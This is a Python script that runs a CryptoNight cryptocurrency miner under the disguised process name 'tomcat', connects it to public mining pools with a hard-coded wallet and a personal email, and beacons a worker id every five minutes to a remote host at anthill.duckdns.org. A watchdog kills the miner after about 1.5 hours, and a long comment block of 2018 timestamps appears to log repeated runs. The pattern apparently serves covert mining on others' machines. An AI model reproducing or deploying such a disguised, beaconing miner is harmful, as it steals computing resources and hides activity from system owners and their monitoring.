import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:01.813224
#2018-02-17 17:01:07.542190
#2018-02-17 18:50:06.564073
#2018-02-17 20:39:05.958051
#2018-02-17 22:26:05.649022
#2018-02-18 00:09:01.523080
#2018-02-18 02:01:03.785116
#2018-02-18 03:48:01.380813
#2018-02-18 05:35:08.903210
#2018-02-18 07:28:05.509189
#2018-02-18 09:16:04.056349
#2018-02-18 11:01:07.324932
#2018-02-18 12:47:07.332717
#2018-02-18 14:33:03.780063
#2018-02-18 16:23:04.785282
#2018-02-18 18:12:05.368076
#2018-02-18 19:57:07.422775
#2018-02-18 21:43:06.748581
#2018-02-18 23:32:05.954051
#2018-02-19 01:18:04.871412
#2018-02-19 03:06:04.423705
#2018-02-19 04:51:07.630876
#2018-02-19 06:37:06.833111
#2018-02-19 08:28:04.403555
#2018-02-19 10:16:08.467937
#2018-02-19 12:03:08.292903
#2018-02-19 13:50:09.495124
#2018-02-19 15:39:07.143025
#2018-02-19 17:25:08.864069
#2018-02-19 19:13:05.808279
#2018-02-19 21:02:01.264240
#2018-02-19 22:49:03.603260
#2018-02-20 00:34:07.677413
#2018-02-20 02:23:06.440359
#2018-02-20 04:13:07.459677
#2018-02-20 05:56:01.999772
#2018-02-20 07:42:01.860626
#2018-02-20 09:26:06.828989
#2018-02-20 11:10:08.414341
#2018-02-20 12:57:04.606305
#2018-02-20 14:41:03.787594
#2018-02-20 16:27:10.000759
#2018-02-20 18:13:05.730810
#2018-02-20 20:05:08.900178
#2018-02-20 21:52:06.714160
#2018-02-20 23:33:04.552050
#2018-02-21 01:19:03.662148
#2018-02-21 03:06:06.750374
#2018-02-21 04:54:06.214820
#2018-02-21 06:42:06.779618
#2018-02-21 08:28:01.322186
#2018-02-21 10:14:05.053021
#2018-02-21 12:02:08.537006
#2018-02-21 13:52:07.708909
#2018-02-21 15:36:01.678464
#2018-02-21 17:26:05.191993
#2018-02-21 19:13:04.458143
#2018-02-21 20:59:01.982844
#2018-02-21 22:46:01.983791
#2018-02-22 00:34:05.268313
#2018-02-22 02:23:02.044468
#2018-02-22 04:10:08.411283
#2018-02-22 05:55:06.125133
#2018-02-22 07:41:08.077765
#2018-02-22 09:31:04.882902
#2018-02-22 11:16:07.622158
#2018-02-22 13:01:09.178541
#2018-02-22 14:48:06.644170
#2018-02-22 16:35:05.732623
#2018-02-22 18:20:11.804724
#2018-02-22 20:12:02.041836
#2018-02-22 21:59:06.891381
#2018-02-22 23:47:03.609643
#2018-02-23 01:35:03.067291
#2018-02-23 03:21:01.473256
#2018-02-23 05:07:01.948625
#2018-02-23 06:52:03.783058
#2018-02-23 08:43:06.928843
#2018-02-23 10:59:04.161764
#2018-02-23 12:55:01.613606
#2018-02-23 14:41:01.669201
#2018-02-23 16:29:09.301504
#2018-02-23 18:16:08.468515
#2018-02-23 20:01:06.282857
#2018-02-23 21:44:03.982838
#2018-02-23 23:38:06.793711
#2018-02-24 01:28:06.110697
#2018-02-24 03:20:08.478787
#2018-02-24 05:06:06.493829
#2018-02-24 06:54:04.973940
#2018-02-24 08:45:07.103565
#2018-02-24 10:40:05.915284
#2018-02-24 12:26:01.635466
#2018-02-24 14:19:06.780593
#2018-02-24 16:07:02.063879
#2018-02-24 17:58:01.299187
#2018-02-24 19:46:04.072962
#2018-02-24 21:31:05.421599
#2018-02-25 00:16:06.477276
#2018-02-25 04:16:05.785587
#2018-02-25 07:47:04.783514